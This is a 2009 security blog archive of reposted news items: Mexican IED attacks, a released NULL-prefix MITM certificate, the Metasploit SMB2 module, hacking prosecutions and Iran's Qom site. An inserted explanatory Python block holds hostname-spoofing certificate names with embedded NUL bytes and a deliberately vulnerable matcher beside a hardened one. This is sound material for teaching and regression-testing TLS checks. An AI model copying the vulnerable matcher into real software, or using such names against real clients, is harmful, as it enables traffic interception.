Wednesday, September 30, 2009

Mexico: Emergence of an Unexpected Threat

Via Stratfor (Global Security & Intelligence Report) -

At approximately 2 a.m. on Sept. 25, a small improvised explosive device (IED) consisting of three or four butane canisters was used to attack a Banamex bank branch in the Milpa Alta delegation of Mexico City. The device damaged an ATM and shattered the bank’s front windows. It was not an isolated event. The bombing was the seventh recorded IED attack in the Federal District — and the fifth such attack against a local bank branch — since the beginning of September.

The attack was claimed in a communique posted to a Spanish-language anarchist Web site by a group calling itself the Subversive Alliance for the Liberation of the Earth, Animals and Humans (ASLTAH). The note said, “Once again we have proven who our enemies are,” indicating that the organization’s “cells for the dissolution of civilization” were behind the other, similar attacks. The communique noted that the organization had attacked Banamex because it was a “business that promotes torture, destruction and slavery” and vowed that ASLTAH would not stop attacking “until we see your ashes.” The group closed its communique by sending greetings to the Earth Liberation Front (ELF), the Animal Liberation Front (ALF) and the “eco-pyromaniacs for the liberation of the earth in this place.” Communiques have also claimed some of the other recent IED attacks in the name of ASLTAH.

On Sept. 22, authorities also discovered and disabled a small IED left outside of a MetLife insurance office in Guadalajara, Jalisco state. A message spray-painted on a wall near where the device was found read, “Novartis stop torturing animals,” a reference to the multinational pharmaceutical company, which has an office near where the IED was found and which has been heavily targeted by the group Stop Huntingdon Animal Cruelty (SHAC). Novartis is a large customer of Huntingdon Life Sciences, the research company SHAC was formed to destroy because Huntingdon uses animals in its testing for harmful side effects of drugs, chemicals and consumer items. A second message spray-painted on a wall near where the device was found on Sept. 22 read, “Novartis break with HLS.” Two other IEDs were detonated at banks in Mexico City on the same day.

These IED attacks are the most recent incidents in a wave of anarchist, animal rights, and eco-protest attacks that have swept across Mexico this year. Activists have conducted literally hundreds of incidents of vandalism, arson and, in more recent months, IED attacks in various locations across the country. The most active cells are in Mexico City and Guadalajara.

For a country in the midst of a bloody cartel war in which thousands of people are killed every year — and where serious crimes like kidnapping terrorize nearly every segment of society — direct-action attacks by militant activists are hardly the biggest threat faced by the Mexican government. However, the escalation of direct-action attacks in Mexico that has resulted in the more frequent use of IEDs shows no sign of abating, and these attacks are likely to grow more frequent, spectacular and deadly.

NULL Certificate Prefix Bug - MITM Cert - Merry Certmas!

Hello *,

In the spirit of giving and sharing, I felt it would be nice to enable other Noisebridgers (and friends of Noisebridge) to play around with bugs in SSL/TLS.

Moxie was just over and we'd discussed releasing this certificate for some time. He's already released a few certificates and I thought I'd join him. In celebration of his visit to San Francisco, I wanted to release fun-times-at-moxie-marlinspike-high. This is a text file that contains a fully valid, signed certificate (with private key) that can be used to exploit the NULL certificate prefix bug[0]. The certificate is valid for * on the internet (when exploiting libnss software). The certificate is good for two years. It won't work for exploiting the bug for software written with the WIN32 api, they don't accept (for good reason) *! I suggest the use of Moxie's sslsniff[1] if you're so inclined to try network related testing. It may also be useful for testing code signing software.

It's been long enough that everyone should be patched for this awesome class of bugs. This certificate and corresponding private key should help people test fairly obscure software or software they've written themselves. I hope this release will help with confirmation of the bug and with regression testing. Feel free to use this certificate for anything relating to free software too. Consider it released into the public domain of interesting integers.
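The NUL-prefix bug the post above is built around, as an added example that is not part of the original post and not libnss code: a hostname matcher that emulates the C-string comparison which made `www.paypal.com\0.attacker` look like `www.paypal.com` (and honoured a bare `*`), beside a hardened check that rejects embedded NUL bytes and accepts a wildcard only as the whole leftmost label. The certificate names are constructed sample values.

```python
"""Hostname-vs-certificate-name matching, illustrating the NUL-prefix class of
bug. Added example: not code from the original post or from libnss; the
vulnerable function only emulates the behaviour of C-string comparison."""

from typing import Optional

# Constructed samples: the Common Name as a DER parser hands it back
# (length-prefixed, so the embedded NUL byte survives parsing).
NUL_PREFIX_CN = b"www.paypal.com\x00.attacker-controlled.example"
WILDCARD_NUL_CN = b"*\x00.attacker-controlled.example"
HONEST_CN = b"www.example.com"
HONEST_WILDCARD_CN = b"*.example.com"


def cstring_truncate(name: bytes) -> str:
    """What a C-string API (strcmp/strcasecmp) sees: nothing past the first NUL."""
    return name.split(b"\x00", 1)[0].decode("ascii", "replace")


def match_vulnerable(cert_cn: bytes, host: str) -> bool:
    """The buggy behaviour: compare the CN as a C string and honour a bare '*'."""
    cn = cstring_truncate(cert_cn).lower()
    host = host.lower()
    if cn == "*":
        return True
    if cn.startswith("*."):
        return host.endswith(cn[1:])
    return cn == host


def hardened_reason(cert_cn: bytes, host: str) -> Optional[str]:
    """Return None when cert_cn legitimately covers host, else the rejection reason.

    1. an embedded NUL byte is never legitimate in a DNS name: reject outright
    2. the name must be ASCII with no leading or trailing dot
    3. a wildcard is accepted only as the entire leftmost label of a name with
       at least two more labels, and it covers exactly one host label
    4. otherwise the names must be equal, case-insensitively
    """
    if b"\x00" in cert_cn:
        return "embedded NUL byte in certificate name"
    try:
        cn = cert_cn.decode("ascii").lower()
    except UnicodeDecodeError:
        return "non-ASCII certificate name"
    if not cn or cn.startswith(".") or cn.endswith("."):
        return "malformed certificate name"
    host = host.lower().rstrip(".")
    labels = cn.split(".")
    if "*" in cn:
        if labels[0] != "*" or len(labels) < 3 or any("*" in l for l in labels[1:]):
            return "wildcard only allowed as the entire leftmost label"
        host_labels = host.split(".")
        if len(host_labels) != len(labels) or host_labels[1:] != labels[1:]:
            return "wildcard does not cover host"
        return None
    if cn != host:
        return "certificate name does not match host"
    return None


def match_hardened(cert_cn: bytes, host: str) -> bool:
    return hardened_reason(cert_cn, host) is None


if __name__ == "__main__":
    for cn in (NUL_PREFIX_CN, WILDCARD_NUL_CN, HONEST_CN, HONEST_WILDCARD_CN):
        for host in ("www.paypal.com", "www.example.com", "a.b.example.com"):
            print(cn, host, match_vulnerable(cn, host), hardened_reason(cn, host))
```

The vulnerable matcher accepts both constructed certificates for any host, which is exactly the regression a test suite for the NUL-prefix bug should catch.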




Tuesday, September 29, 2009

Texas Gov. Perry's Web Site Hacked (Perhaps)

Via (Austin, TX) -

Gov. Rick Perry's web site was hacked into Tuesday morning just before the Governor was about to give live remarks on the site. A statement on the web site says that it was deliberately interrupted by a denial-of-service attack.

At around 11:30 a.m. the web site displayed an error message that said “Unable to connect to database server.” Perry's spokesman Mark Miner called it internet sabotage. Perry was about to give a live webcast on Talkin' Texas. Below is the statement published on the site.

"Statement from Texans for Rick Perry Spokesman Mark Miner Concerning Internet Sabotage

Today’s ‘Talkin' Texas’ webcast by Gov. Perry was deliberately interrupted by a denial-of-service attack, preventing countless users from logging in to view the Governor’s remarks. This planned and coordinated attack was political sabotage, and we are working to identify those responsible for this illegal activity. Before the attack was initiated, more than 22,000 users were able to log in and view Gov. Perry’s complete remarks, which will be distributed shortly."


Before I can believe this "coordinated political sabotage" claim, I need to see a little more evidence.

Clearly, if the site had been DDoSed...then no one would have seen his remarks. So if 22,000 users were able to log in and view his remarks...then it wasn't a DDoS at the network level. So what happened?

And what is this “Unable to connect to database server.” error? Sounds like they maxed their backend database connections. Perhaps the site wasn't able to handle the load - which is far from "political sabotage".

Immunity Predicts Out of Band SMB2 Patch Unlikely

I asked the Immunity team to take a look into the new exploit to assess whether Microsoft would patch the SMBv2 bug early, and our initial assessment is "no, they will not."

Our assessment is that the exploit works by relying on some key magic numbers - one of which is what redirects execution to the payload. In some circumstances, this magic number is always the same - i.e. in VMWare or in some specific hardware configurations. However, in many situations (i.e. you don't have the exact same hardware the exploit expects) this number will be different, resulting in a bluescreen.

Working around this issue in the current public exploit is probably two weeks of work. At that point, we're nearing Microsoft Tuesday and the need for an out of band patch is moot.


For those that haven't been watching the twitter feeds, there has been some discussion between security folks on the reliability of the current SMB2 Code Execution module.

HD Moore -
@bobmcmillan definitely works on at least *some* physical machines, but looks like it could use more testing. @msuiche says multi-cpu breaks

Convicted Cybercriminal Locks Down Computers During Prison Programming Project

Via The Register UK -

A UK prison computer system was left in lockdown after jail bosses gave a convicted cybercriminal the task of reprogramming it, the Sunday Mirror reports. Douglas Havard, 27, an inmate at Ranby Prison, Nottinghamshire, was asked to take over a project to create an internal TV station using the jail's computer network. Havard is half-way through a six year term over his involvement in a £6.5m hacking and phishing scam (more details here), something the prison governors must have reckoned gave him the requisite computer programming skills. [...] Havard and Elwood were arrested following a National Hi-Tech Crime Unit (NHTCU) investigation into eastern European phishing fraudsters.

After he was reportedly left unsupervised during the prison programming project, Havard spent his time altering system passwords so that everyone else was locked out. Prison bosses had to hire external consultants to sort out the resulting mess. Meanwhile Havard was put into segregation as punishment.

Another inmate at Ranby Prison recently managed to get a key cut that was capable of opening every door at the jail.

A Prison Service spokesman told the Sunday Mirror that the computer breach at Ranby was under investigation. He denied that lags were given unsupervised access and added: "The prisoner was not able to access records of any other prisoners."


WTF? Why not give the stabbing mass murderer in C-Block the responsibility of sharpening the Chef's knives as well?

Sounds like this prison has a serious complacency problem. They think they are in control...which they clearly aren't.

The Qom Uranium Enrichment Facility – What and How Do We Know?

Via FAS Strategic Security Blog -

On Friday, President Obama, President Sarkozy, and Prime Minister Brown revealed a covert Iranian uranium enrichment facility near Qom. Obama announced that “the size and configuration of this facility is inconsistent with a peaceful nuclear program.” In a briefing, Senior White House Administration Officials clarified that the facility is designed to hold about 3,000 centrifuges. Although this number is not large enough to “make sense from any commercial standpoint, […] enough for a bomb or two a year, it’s the right size.”

It is too early to independently verify the US statement that Iran is planning on setting up 3,000 centrifuges at Qom until the IAEA receives and confirms design plans of the facility. Although the circumstantial evidence certainly isn’t helping Iran’s peaceful nuclear energy claim, we cannot definitively conclude that the enrichment plant has a military function. Senator Feinstein, the Chairman of the Senate Intelligence Committee, said that Iran’s “intention to produce weapons-grade uranium in the Qom facility has not yet been proven,” although there are strong indications.


According to unclassified US documents released by ISIS, although the Qom plant is reportedly located on an Islamic Revolutionary Guard Corps Base, it is managed by the Atomic Energy Agency of Iran.

So, is the “size and configuration” of the Qom plant inconsistent with a peaceful nuclear facility? Not entirely. While the circumstantial evidence raises suspicions, based on available evidence, we cannot currently prove it is a military facility. First, we have no way of confirming the Administration’s statement that Iran will set up 3,000 centrifuges at Qom until the IAEA receives and verifies design information of the facility. Even if the intelligence was correct, Iran could have changed its plans since the existence of the facility became public, especially if no machines have been set up yet. The 3,000 centrifuges announced by the US are definitely not enough for industrial-scale production of LEU for nuclear reactor fuel. However, this doesn’t automatically mean that the facility was meant for bomb production. We don’t know how the plant is configured since, again, no machines have been installed. And, again, this will not be known until inspectors are on the ground.

The facility’s protected and heavily disguised location certainly isn’t helping Iran’s peaceful nuclear program claim. Although repeated Israeli threats of an attack may have developed circumstances for Iranian nuclear safety concerns, this does add to Iran’s track record of ambiguous behavior.

Since the technology to enrich uranium to a small degree for nuclear fuel and to a large degree for nuclear bombs is the same, ultimately the question falls on proving Iran’s intent. The US has admitted that intention to produce HEU has not yet been proven, despite the indications for clandestine activity. If Iran is developing a peaceful program, then it should assuage concerns by adopting further transparency measures, like implementing the revised Code 3.1 of the Subsidiary Arrangements and ratifying the Additional Protocol. On the bright side, US intelligence was good enough to be able to detect a covert nuclear facility. And Iran’s letting inspectors in at Qom is good news.


Great review of the public intelligence on the Qom Facility. See the full FAS blog for more details, including possible uranium enrichment scenarios...

Harakat Al-Shabab Mujahideen Executes Two Men Accused of Spying for CIA & AMISOM Troops

Via -

The Islamist fighters of Harakat Al-shabab Mujahideen on Monday executed two men accused of spying for the CIA and the AMISOM troops in the Somali capital, Mogadishu.

Sheik Ali Mohamed Hussein, the representative of Harakat Al-shabab Mujahideen for the Banadir region, was among the crowd that gathered at the Maslah building in the north of the capital, where the sentences were carried out. He said that there were three men, two of whom were sentenced to death, while the third was flogged with 29 lashes and ordered into exile from the country.

The representative of Harakat Al-shabab Mujahideen said that the executed men had been spying for the CIA and the African Union troops of AMISOM, while the flogged man was charged with making counterfeit US dollars. He added that they are also planning to bring other criminals before the Islamic court to be sentenced like these men.

Sheik Ali Mohamed said they executed the men because the Islamic court found them guilty, pointing out that they were also the masterminds of the killings of Salah Nabhan and Mo'allin Aden Hashi Erow.

Monday, September 28, 2009

Facebook HTML Injection

Apple Pushes Unwanted iPhone Enterprise Tool to Windows Users

Via -

Apple is telling iTunes and QuickTime users on Windows that they need to download the iPhone Configuration Utility, an enterprise tool that is useless for most consumers, via its Apple Software Update program for Windows.

Apple is once again using its updating program that comes with iTunes and QuickTime on Windows to push unwanted software. This time around, the software in question is an iPhone enterprise tool that is more than useless for most consumers.
ZDNet spotted the update, though when we asked around we learned it was actually pushed out earlier this month. Nevertheless, we downloaded iTunes and installed it on a Windows 7 machine to see if we could reproduce the annoyance. We could. Apple is, for whatever reason, pushing enterprise software to Windows PC users who use Apple software.

Here's the description Apple gives for the iPhone Configuration Utility:
Configuration Utility lets you easily create, maintain, encrypt, and install configuration profiles, track and install provisioning profiles and authorized applications, and capture device information including console logs.

Configuration profiles are XML files that contain device security policies, VPN configuration information, Wi-Fi settings, APN settings, Exchange account settings, mail settings, and certificates that permit iPhone and iPod touch to work with your enterprise systems. For instructions on how to use iPhone Configuration Utility, see the iPhone and iPod touch Enterprise Deployment Guide, available for downloading at

Not only is this irrelevant to many iTunes users, since most of them don't even have an iPhone, it's clearly an enterprise tool that even the majority of iPhone users don't need or want. This "update" should not be checked by default, and instead should be clearly marked as optional. To go even further, though, an update utility should not be prompting to install new software. This is a new program that Apple Software Update is pushing to users, and not an update for a program or programs the user already has installed. If Apple finds it necessary to include its update tool to anyone who installs iTunes or QuickTime, the company should make sure it only offers updates for installed software, and not push out new software whenever it feels like it.

Apple has been called out in the past for using its updater to push unwanted applications out to Windows users, but it looks like the bad press hasn't had any long term impact. In March 2008, Apple was heavily criticized for pushing Safari to iTunes and QuickTime users, also through Apple Software Update on Windows. The obvious goal was to increase the browser's small market share on Windows (and it worked, if not at least temporarily), but the way the company decided to do so was very sly.

The next month, Apple posted an "update to Software Update for updating software updates" which added a "New Software" category for listing any Apple software for Windows that is not already installed separately from other updates. Unfortunately, it looks like Cupertino isn't following the rules it created in response to the previous outcries. In the screenshot above, you can see that the MobileMe Control Panel is in this category, but why isn't the iPhone Configuration Utility?


Someone please remind Apple that they do have Windows customers....whether they like it or not.

I am a MacBook Pro user...I am an iPhone user...but I am also a Windows XP user and I wish Apple would take a second to remember they aren't the center of the world....hell, they aren't even 6% of the OS market share.

SMB2 Code Execution Module Released for Metasploit

Via Metasploit Blog -

This [Sunday] morning Stephen Fewer released his long-awaited SMB2 code execution module for the Metasploit Framework. He plans to publish a whitepaper in the near future that discusses the exploit technique and the newly written Vista/2008 ring0 to ring3 stager code. This module is available in the 3.3-dev tree and supports Vista SP1/SP2 and 2008 SP1/SP2 (but not R2) with the same offsets and addresses. Keep in mind that the best workaround for this still-unpatched flaw is to disable the SMB2 protocol.


According to the exploit module...
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.

Sunday, September 27, 2009

Satellite Imagery of Possible Site of the Qom Enrichment Facility in Iran

Via Ogle Earth -

During the North American day yesterday ISIS chimed in with its best guess (PDF) for where Iran's newly declared underground nuclear fuel enrichment plant is situated — two guesses, in fact.

One of them is the same as the location identified in the previous post here on Ogle Earth as a likely candidate for the site. But ISIS also identifies another possible location further to the east.

ISIS has the benefit of very recent imagery it commissioned, taken by DigitalGlobe — August 2009 for the already-identified candidate, and January 2009 for the new candidate. The new candidate in particular shows much development work in the intervening four years between when the base imagery in Google Earth was taken and the DigitalGlobe imagery acquired in 2009.



The other candidate, to the west, shows little outward change in the intervening four years. Based on the 2009 imagery, my inexpert opinion now favors the new candidate identified by ISIS.

ISIS's findings are in PDF format, so I took the images therein and positioned them as overlays in Google Earth. Here they are available as a KMZ download. Play with the opacity slider in the sidebar to switch between 2009 and 2005.

(Note: Because the imagery is of hilly terrain and taken from a different position in the sky, it is not perfectly alignable with the base imagery.)

Saturday, September 26, 2009

Taliban Commander Known as “the Butcher” Dies After Arrest in Swat Valley

Via (Terrorism Monitor Volume: 7 Issue: 29) -

The Pakistani military’s powerful offensive in Swat has destroyed much of the terror network of the Taliban. The fiery “FM Mullahs” who once announced death threats to opponents on their radio networks are now silenced. Their readily available spokesmen claiming responsibility for the daily deadly attacks on security forces are now in government custody. The men who flogged those considered to be in violation of Islamic law have either been killed or captured. Above all, in a recent development, the notorious head of the Taliban’s throat-cutter squads, Sher Mohammad Qasab, was arrested and subsequently died while in government custody (Dawn [Karachi], September 20).

Qasab was a symbol of terror, having slaughtered police and military officials and all other opponents, including “spies” and members of anti-Taliban tribal militias. He did this publicly and sometimes on videotape to terrorize the rest of the people. He used to make piles of heads in the notorious Green Chowk (later known as Khooni Chowk, or Bloody Square) in the Swat capital of Mingora, once famous for tourism and scenic spots. The mutilated and decapitated bodies were often left hanging on poles with threatening notes.

The arrest and death of Sher Mohammad Qasab is considered to be a major blow to the Taliban network in Swat. His capture marked the fourth high profile elimination of a Taliban commander in Swat this month after the capture of Taliban commander Mehmood Khan, the capture of Taliban spokesman and organizer of suicide bombings Muslim Khan, and the killing of fiery “Radio Mullah” Shah Dauran, who used to announce every evening the names of those waiting in the death queue (Daily Times [Lahore], September 4; September 12).

Flash Version of Visitors - More Than 50% Vulnerable

According to my Google Analytics, less than half of my visitors in the last month...are running an updated version of Adobe Flash.

Sadly, this number isn't quite surprising, even given the security implications of running old Flash. Those that are running 10.0.22 are vulnerable to at least 10 different security vulnerabilities.

If you aren't sure what version of Adobe Flash your browser supports, then I would highly recommend checking out Adobe's Flash Version Tester. At the time of this post, the latest & "greatest" version of Flash is

About 80% of my visitors are running either IE or Firefox on Windows. For Windows users, I would recommend using Secunia's Online Software Inspector (OSI). The Secunia Online Software Inspector, or OSI for short, is a fast way to scan your PC for the most common programs and vulnerabilities, thus checking if your PC has a minimum security baseline against known patched vulnerabilities. It checks for outdated versions of Adobe Flash, Sun Java, Quicktime, iTunes...and much more. It does require that Java be enabled for it to work...

Adobe provides uninstallers and installers for most of the major operating systems, so get to patching!

Iran to Allow IAEA Inspectors into Nuclear Plant

Via VOA News -

Iran says it will allow inspectors from the International Atomic Energy Agency into its newly disclosed uranium enrichment plant.

Iran's nuclear chief, Ali Akbar Salehi, said Saturday on Iranian state television the timing of the visit will be worked out with the IAEA.

Earlier, a top aide to Iran's Supreme Leader said the Iranian nuclear facility should be operational soon.

The chief of staff to Ayatollah Ali Khamenei told Iran's Fars News Agency that "God Willing, the new plant will be operational soon and make the enemy blind."

On Friday, U.S. President Barack Obama and other Western leaders accused Iran of building a secret nuclear plant and insisted the IAEA have immediate access to ensure it is not being built to produce nuclear weapons.

Iran denied the facility has been a secret.

Iranian President Mahmoud Ahmadinejad said Iran complied with IAEA rules by informing the agency early enough that the facility near the holy Shi'ite city of Qum was under construction.

In Israel Saturday, Foreign Minister Avigdor Lieberman said the newly disclosed atomic facility was proof Iran is seeking nuclear weapons. He said he hopes world powers will give an "unequivocal" response when representatives from Germany, the U.S., Britain, France, China and Russia meet with Iranian officials in Geneva on October 1.

Friday, September 25, 2009

Al-Qaida and the German Elections

Via -

Usama Bin Ladin has just released a new audio statement to the European peoples. It is relatively short (under 5 minutes) and basically tells the Europeans to get out of Afghanistan. The statement is subtitled in German and is clearly timed to coincide with the German elections this coming Sunday.

Bin Ladin’s statement comes in addition to a series of three statements from Bekkai Harrach threatening Germany. I have not seen this kind of jihadi media offensive in connection with any other non-US election. Of course, I, like everyone else, can’t help thinking of the Spanish elections in 2004.

Peter Neumann at FREEradicals has a good analysis where he reveals that German intelligence are very nervous. Should they be?

Personally I think al-Qaida would not issue all these messages if something really big was in the making in the next few days, precisely because media offensives put intelligence services on high alert.

My guess is that these messages are primarily intended to influence German public opinion at a crucial juncture in the Western campaign in Afghanistan. Germany is a pivotal player in the coalition; her withdrawal could initiate a vicious (or virtuous, depending on one’s preferences) circle of European withdrawals from the Afghanistan enterprise. Al Qaida is focusing on the weakest link in the coalition, just as the Madrid bombers were advised to do.

Another function of messages such as this is to set the stage for attacks that may be several months away. By warning Germans before the elections, al-Qaida can punish them afterwards for not doing as he said.

Finally, Bin Ladin and Harrach are probably also hoping that these messages will inspire some independent initiatives from grassroots jihadists in Europe. Today’s arrest of a man in Stuttgart suspected of distributing the video suggests there are people inside Germany who are thus inclined. On a related note, Leah at All Things CT has a post about forum reactions to the Bin Ladin message.

In short, there are good reasons for German analysts to be working some overtime this weekend.

Jordanian Arrested Over Dallas Bomb Plot

Via Maktoob Business (Terrorism) -

A Jordanian man was arrested and charged with attempting to blow up a skyscraper in Dallas on Thursday, the latest in a series of alleged bomb plots disclosed by U.S. officials.

A U.S. Justice Department statement said Hosam Maher Husein Smadi, 19, was arrested after planting an inert bomb at Fountain Place, a 60-story glass tower in downtown Dallas following an undercover FBI operation.

Details of Smadi's arrest were disclosed hours after authorities in Illinois revealed a broadly similar case in Springfield.

Smadi was described as a Jordanian citizen staying in the United States illegally who had "repeatedly espoused his desire to commit violent Jihad," the Justice Department said.

"The highest priority of the FBI and the Department of Justice remains the prevention of another terrorist attack within the United States," said James Jacks, U.S. Attorney for the Northern District of Texas.

"The identification and apprehension of this defendant, who was acting alone, is a sobering reminder that there are people among us who want to do us grave harm," he added in a statement.

Officials stressed however that Smadi's arrest was unrelated to an ongoing investigation in Colorado and New York involving an Afghan-born airport worker accused of plotting a bombing campaign.

The Justice Department statement said Smadi had declared his willingness to serve as a "soldier for Osama Bin Laden and Al Qaeda" and to conduct Jihad.

He is alleged to have told undercover FBI agents posing as members of an Al Qaeda sleeper cell that he had come to the United States specifically to commit "Jihad for the sake of God."

Smadi has been charged with attempting to use a weapon of mass destruction.

Iran on Defensive Over Undeclared Enrichment Site - Near Qom

Via BBC -

The announcement of a second uranium enrichment site puts Iran on the defensive as it tries to head off further sanctions.

The site - said to be near Qom - was acknowledged by Iran in a letter to the International Atomic Energy Agency (IAEA) on Monday, only just pre-empting an announcement by US President Barack Obama. Western intelligence agencies discovered the site some time ago, according to the New York Times.

In its letter to the IAEA, Iran sought to downplay the site's importance, saying that it was a pilot plant still under construction.

The announcement about this site is an embarrassment to Iran, which has said that it is cooperating with the IAEA.

The problem for Iran is that this will increase the suspicions many governments have about its secrecy and its intentions. Under the terms of its agreement with the IAEA, it should have told the agency at the planning and design stage. Iran has tried to repudiate this agreement, so might argue that it did not yet have to report the plant, but the IAEA says that such repudiations are not permitted.

Some fear that Iran is developing at least a nuclear-weapon capacity, with a view to making a bomb one day. Iran says it is against nuclear weapons and is simply making fuel for nuclear power.

Iranian ambitions for this site are not known. It could be that they wanted a back-up in case their main plant at Natanz was attacked. But another fear is that they intended to enrich uranium more highly at the secret plant, to a level suitable for a nuclear explosion.

President Obama said that its size and scope was "inconsistent" with a peaceful programme.

Mark Fitzpatrick of the International Institute for International Affairs said the 3,000 centrifuges estimated to be at the plant would not be enough to make any nuclear fuel but could be used to enrich enough uranium to the higher level needed for a nuclear explosion.

He said that Iran did appear to be in violation of its IAEA safeguards agreement.

"Common sense also dictates that at this time Iran would have been open if it had nothing to hide," he added. "This shows it is far from being on the up-and-up."

The discovery will strengthen the demands by the US and its allies for further sanctions to be imposed on Iran unless it suspends all enrichment, as required by the Security Council.

This might help explain why this week Russia appeared to soften its opposition to further sanctions.

The US wants Iran's oil and gas industries to be targeted. Current Security Council sanctions aim principally at its nuclear and ballistic missile work.

President Obama demanded that the new site be opened immediately to IAEA inspection.


According to CNN...

The second nuclear facility, on a military base near the Shia Muslim holy city of Qom, is thought to be capable of housing 3,000 centrifuges, not enough to produce nuclear fuel to power a reactor, but sufficient to manufacture bomb-making material, a U.S. diplomatic source who read the letter told CNN.

Honda Unveils U3-X Unicycle for Robots

Honda on Wednesday unveiled the U3-X, a stool with a unique directional wheel system that allows it to travel diagonally, as well as right, left, forward, and backward.

It's basically a robotic unicycle.

The device is able to readjust itself so that instead of riders having to constantly balance themselves, the robotic unicycle does the compensating.

Honda pointed out in its unveiling video that the U3-X's seat is slightly higher than an average person's waistline, forcing riders to jump up slightly to sit on it and place their feet on a foot rest. This elevated height of the robotic unicycle leaves riders at relative eye level with passing pedestrians while in motion, according to Honda.

It's a nice touch. A common complaint among people in wheelchairs is the social and psychological effect of literally being looked down upon while traveling the world in a sitting position. But requiring the rider to be able to hold upright while on a backless seat clearly disqualifies the U3-X as a wheelchair substitute for many.

And in this age of rising obesity, who among the fitness-conscious is really going to ride the streets on a robotic stool when they can get a little chance at some exercise during their busy day by walking?

It's just one of those things you know no one is really going to buy. So why, then, did Honda unveil the U3-X robotic unicycle?

Like the Segway, the U3-X is more about showing off an engineering breakthrough than selling an actual product. In this case, Honda contributes to the ongoing discourse on mobility among roboticists.


Honda's HOT Drive System (Honda Omni Traction Drive System), the omni-directional wheel Honda claims is the "world's first wheel structure which enables movement in all directions," adds to this ongoing discourse on mobility.

Note Honda's word choice in describing their system.

The U3-X is not the first multi-directional rolling robot and Honda knows this. Carnegie Mellon, for example, unveiled the Ballbot in 2006. But the method Honda uses--which includes synchronizing small motor-controlled wheels to make the U3-X multi-directional--is unique.

Honda's U3-X also includes balance control technology that allows the device to respond to how its load shifts and readjust balance accordingly while on the go.

"The incline sensor detects the incline of the device based on the weight shift of the rider and determines the rider's intention in terms of the direction and speed. Based on the data, precise control is applied to return the device to an upright position, which achieves smooth and agile movements and simple operation by weight shift only," Honda said in a statement.

MMS Debuts for the iPhone

So today is the day, Sept 25th...the day AT&T and Apple will push out a carrier file update via iTunes and enable MMS.

Plea Deal Clears NGA Intelligence Analyst of Felony Hacking

Via (Threat Level) -

Federal prosecutors dropped a felony hacking charge Thursday against a Defense Department intelligence analyst who poked around in a system involved in a national terrorism investigation.

The analyst, Brian Keith Montgomery, pleaded guilty to a misdemeanor charge instead, settling the case and making prison time unlikely.

Montgomery held a top secret clearance while working on a covert program at the National Geospatial-Intelligence Agency — the spy agency in charge of satellite and aerial image collection. On April 9, while stationed at an NGA facility on Fort Belvoir in northern Virginia, the 10-year agency veteran saw a message that “provided significant detail about a classified operation” that was unrelated to his job, according to a court affidavit filed by a Pentagon investigator.

The analyst twice logged in to a system involved in the terrorism investigation: first on April 9, when he stayed on for two hours, and then on April 14. He’d gotten the password from another classified message to which he also had legitimate access. Montgomery later told investigators that he hadn’t noticed a warning in the message advising that only personnel participating in the classified operation were authorized to use the password.

Court records say little about the system Montgomery logged into, except that it was being used from around the United States, and was being monitored by the FBI and other law enforcement agencies at the time of Montgomery's access.

By accessing the system, Montgomery endangered the terrorism investigation, and “caused harm to the U.S. Army and the FBI,” according to an affidavit by Dexter Wells, an agent with the Defense Criminal Investigative Service.

Federal prosecutors in the Eastern District of Virginia charged Montgomery on Sept. 11 with a single felony count under a provision of the Computer Fraud and Abuse Act that covers intrusions in which damage is done or public safety is jeopardized.

The charge was dropped in a plea deal on Wednesday. Montgomery pleaded guilty to a new, lesser charge of exceeding his authorized access to the NGA computer on which he read about the terrorism operation and obtained the password to the unnamed system. The misdemeanor carries up to a year in prison, but sentencing guidelines suggest probation for a first offense.

In an interview with Threat Level last week, Montgomery said he was being made a scapegoat for a security slip-up that sent the password to thousands of analysts without the need-to-know.

“In my opinion, go after the person who provided me with that information,” he told Threat Level last week. “I was just a consumer. I wasn’t the person who put that username and password out there for tens of thousands of analysts to see.”

The United States Attorney’s office has not returned a phone call on the case. Montgomery and his attorney did not immediately return phone calls Thursday.

Al-Qaida Declares New "Cabinet Roster" for its "Islamic State of Iraq" (ISI)

Via CT Blog (Sept 21, 2009) -

Al-Qaida's "Islamic State of Iraq" (ISI) has issued an updated leadership "cabinet roster." The roster reads as follows:

- Deputy Emir and Minister of War: "Abu Hamza al-Muhajir, Abdel Moneim al-Badawi"
- Minister of Shariah Councils: "Shaykh Abdul Wahab al-Mashhadani"
- Minister of Public Relations: "Shaykh Mohammed al-Dulaimi"
- Minister for Prisoners and Martyrs: "Shaykh Hassan Jubouri"
- Minister of Security: "Professor Shaykh Abdul Razzaq al-Shammari"
- Minister of Health: "Dr. Shaykh Abdullah Qaisi"
- Minister of Information: "Shaykh Professor Ahmad al-Tai"
- Minister of Petroleum: "Shaykh Osama Laheebi"
- Minister of Finance: "Shaykh Professor Yunis al-Hamdani"

First Draft of a Framework for Building a Smart Grid Unveiled

Via -

Commerce Secretary Gary Locke has unveiled the first draft of a Smart Grid framework that lays the foundation for a secure, interoperable, next-generation power distribution system.

The report, titled "Framework and Roadmap for Smart Grid Interoperability Standards, Release 1.0" and developed by the National Institute of Standards and Technology, identifies about 80 existing standards that apply to the development of the new grid infrastructure, and outlines steps to address key gaps remaining to be addressed.

“The Smart Grid will ultimately require hundreds of standards,” the framework says. “Some are more urgently needed than others,” because equipment such as smart meters that can monitor residential power use and provide data back to the utility, already are being deployed. The current report “is only the beginning of an ongoing process that is needed to create the full set of standards that will be needed to manage their evolution in response to new requirements and technologies.”

The framework is the product of the first phase of an aggressive three-phase program by NIST to establish Smart Grid standards by the end of the year.


NIST’s three-phase approach to standards development is:
  • Develop a consensus among utilities, equipment suppliers, consumers, standards developers and other stakeholders on needed standards, and produce a Smart Grid architecture, an initial set of standards to support implementation and plans for developing the remaining standards by early fall. Finalization of today’s report after a 30-day comment period will complete this phase;
  • Launch formal partnerships to develop the remaining needed standards; and
  • Develop a program for testing and certification to ensure that Smart Grid equipment and systems comply with standards.

Thursday, September 24, 2009

Photo of the Day - Series of Tubes Entrance

Entrance to the series of tubes?

I took this photo just outside of the Peppermill during Defcon 17.

Contractor Pleads Guilty to SCADA Tampering

Via -

A former IT consultant for an oil and gas exploration company has pleaded guilty to tampering with the company's computer systems after he was turned down for a permanent position with the company.

Mario Azar, 28, pleaded guilty on Sept. 14 to one count of damaging computer systems and faces a maximum of 10 years in prison. News of his plea was announced Wednesday by the U.S. Federal Bureau of Investigation.

